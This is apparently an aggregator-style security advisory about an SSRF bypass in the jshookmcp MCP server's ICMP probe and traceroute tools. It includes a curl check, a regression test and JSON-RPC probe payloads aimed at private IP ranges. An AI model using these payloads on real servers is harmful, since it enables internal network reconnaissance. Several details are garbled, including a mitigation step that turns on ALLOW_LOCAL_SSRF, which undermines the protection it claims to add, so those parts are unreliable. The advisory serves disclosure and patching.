jshookmcp, Server-Side Request Forgory (SSRF), GHSA-c5r6-m4mr-8q5j (Medium) -DC-Jul2026-781

Listen to this Post

How the CVE Works

The jshookmcp network domain implements a centralized SSRF authorization policy designed to block access to private, loopback, link-local, and reserved IP addresses. This policy is enforced for raw HTTP, TCP, and TLS RTT tools through the `resolveAuthorizedTransportTarget` function, which checks the target against the policy and requires explicit authorization for private network access.
However, the `network_icmp_probe` and `network_traceroute` tools bypass this security control entirely. Instead of using the authorized resolver, these tools call resolveHostname()—a helper function that returns IPv4 literals directly and performs DNS A lookups without any validation against private, loopback, link-local, or reserved IP ranges.
An MCP client with access to an active network domain can therefore invoke `network_icmp_probe` or `network_traceroute` with an internal address such as 10.0.0.1. The server resolves the target and passes it directly to the native ICMP probe or traceroute sink, completely bypassing the SSRF authorization guard that would normally block the request.

The vulnerable call sequence is:

call_tool(name=network_icmp_probe, args={target: 10.0.0.1, ttl: 64})
-> ctx.router.has(network_icmp_probe) == true
-> ctx.executeToolWithTracking(network_icmp_probe, validatedArgs)
-> RawHandlers.handleNetworkIcmpProbe(validatedArgs)
-> resolveHostname(10.0.0.1) returns 10.0.0.1
-> icmpProbe({ target: 10.0.0.1, ttl: 64, ... })

`resolveAuthorizedTransportTarget` is not called on this path. The same missing policy pattern exists for network_traceroute.
This effectively turns the jshookmcp server into an internal network probing oracle, exposing reachability information, latency measurements, traceroute hops, and ICMP error classes from the server’s network position—all without requiring any authorization.
The vulnerability affects `@jshookmcp/jshook` version `0.3.1` and the main branch at commit d309c39. It was patched in version `0.3.2` with the of resolveAuthorizedHostTarget(), a policy-aware resolver that now blocks private IP ranges by default.

DailyCVE Form

Platform: ……. jshookmcp
Version: …….. 0.3.1
Vulnerability :…… SSRF Bypass (ICMP/Traceroute)
Severity: ……. Medium (CVSS 3.1: 4.3)
date: ………. 2026-05-02

Prediction: …… 2026-05-27 (patched in 0.3.2)

What Undercode Say: Analytics

SSRF Policy Bypass Detection

To verify whether a jshookmcp instance is vulnerable, test the ICMP probe against a private address:

Test ICMP probe against private IP (vulnerable if returns success)
curl -X POST http://localhost:3000/mcp \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"method": "call_tool",
"params": {
"name": "network_icmp_probe",
"arguments": {
"target": "10.0.0.1",
"ttl": 64
}
},
"id": 1
}'

Regression Test (from the security advisory)

The following test proves the bypass exists:

it('bypass proof: call_tool can drive network_icmp_probe to a private IP without the SSRF authorization guard', async () => {
const raw = new RawHandlers();
const ctx = {
router: {
has: vi.fn((name: string) => name === 'network_icmp_probe')
},
executeToolWithTracking: vi.fn((name: string, args: Record<string, unknown>) =>
raw.handleNetworkIcmpProbe(args)
),
} as any;
const response = await handleCallTool(ctx, {
name: 'network_icmp_probe',
args: { target: '10.0.0.1', ttl: 64 }
});
const body = JSON.parse(response.content[bash].text);
expect(body.success).toBe(true);
expect(state.resolveAuthorizedTransportTarget).not.toHaveBeenCalled();
expect(state.icmpProbe).toHaveBeenCalledWith(expect.objectContaining({
target: '10.0.0.1',
ttl: 64
}));
});

Run the test suite:

corepack pnpm exec vitest run --config vitest.config.ts \
tests/server/security/jshookmcp-network-meta-boundary.test.ts \
--reporter=verbose

Affected Code Locations:

| File | Lines | Function | Issue |

||-|-|-|

| `raw-latency-handlers.ts` | 123-139 | `network_traceroute` | Calls `resolveHostname()` without policy check |
| `raw-latency-handlers.ts` | 240-257 | `network_icmp_probe` | Calls `resolveHostname()` without policy check |
| `raw-latency-handlers.ts` | 408-416 | `resolveHostname()` | Returns IPv4 literals directly, no range validation |
| `ssrf-policy.ts` | 244-316 | Central policy | Blocks private targets unless authorized |

Exploit

An attacker with MCP client access to an active network domain can exploit this vulnerability by invoking the `network_icmp_probe` or `network_traceroute` tools with internal IP addresses.

Example exploit payloads:

{
"method": "call_tool",
"params": {
"name": "network_icmp_probe",
"arguments": {
"target": "10.0.0.1",
"ttl": 64
}
}
}
{
"method": "call_tool",
"params": {
"name": "network_traceroute",
"arguments": {
"target": "192.168.1.1"
}
}
}

Internal network reconnaissance targets:

– `10.0.0.0/8` – RFC 1918 private network
– `172.16.0.0/12` – RFC 1918 private network
– `192.168.0.0/16` – RFC 1918 private network
– `127.0.0.0/8` – Loopback
– `169.254.0.0/16` – Link-local
The server responds with ICMP echo results, latency measurements, TTL values, and traceroute hop information—effectively acting as an internal network mapping oracle from the server’s network position.

Impact scenarios:

  • Remote transport exposure: When jshookmcp is exposed over Streamable HTTP or another remote transport
  • Multi-tenant environments: Multiple clients sharing one server
  • Windows or raw socket capability: Enhanced probe capabilities
    This is not code execution and does not by itself exfiltrate response bodies—it is a reconnaissance primitive.

Protection

1. Upgrade to patched version

The vulnerability is fixed in `@jshookmcp/jshook` version `0.3.2`:

npm install @jshookmcp/[email protected]

2. Verify the fix

The patch introduces `resolveAuthorizedHostTarget()` in raw-helpers—a host-only SSRF guard that replaces `resolveHostname()` in both vulnerable handlers. The fix also adds 10 regression tests covering private IP blocks, DNS-to-private resolution, and loopback addresses.

3. Apply environment mitigation

If upgrading is not immediately possible, set the environment variable to explicitly allow local SSRF (note: this weakens security):

ALLOW_LOCAL_SSRF=true

4. Network-level protection

  • Restrict access to the jshookmcp server to trusted clients only
  • Use firewall rules to limit outbound ICMP and traceroute from the server
  • Monitor for unusual `network_icmp_probe` or `network_traceroute` calls in logs

5. Remediation checklist (from the security advisory):

  • [ ] Apply the same authorization model used by `network_rtt_measure` and `network_latency_stats` to `network_icmp_probe` and `network_traceroute`
    – [ ] Accept an optional `authorization` object in both handlers
  • [ ] Resolve targets through the central policy helper or an equivalent host-only policy helper
  • [ ] Block private and reserved ranges by default
  • [ ] Pass only the policy-approved resolved address to the native probe
  • [ ] Add regression tests for default-denied private targets, authorized private CIDR access, private hostnames, and `call_tool` dispatch

Impact

| Aspect | Details |

|–||

| Attack Vector | Network (MCP client → jshookmcp server) |

| Attack Complexity | Low |

| Privileges Required | Access to active network domain |

| User Interaction | None |

| Confidentiality Impact | Low (internal network topology disclosure) |

| Integrity Impact | None |

| Availability Impact | None |

| Scope | Unchanged |

| CVSS Base Score | 4.3 (Medium) |

Practical impact is strongest when:

  • jshookmcp is exposed over Streamable HTTP or another remote transport
  • Multiple clients share one server
  • The server runs on Windows or with raw socket capability

What an attacker can learn:

  • Whether internal hosts are reachable from the server
  • Approximate latency to internal hosts
  • Traceroute hop counts and paths
  • ICMP error classes (host unreachable, port unreachable, TTL exceeded, etc.)
  • Internal network topology and routing information

What an attacker cannot do:

  • Execute arbitrary code
  • Exfiltrate HTTP response bodies
  • Modify internal systems
  • Escalate privileges within the application

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top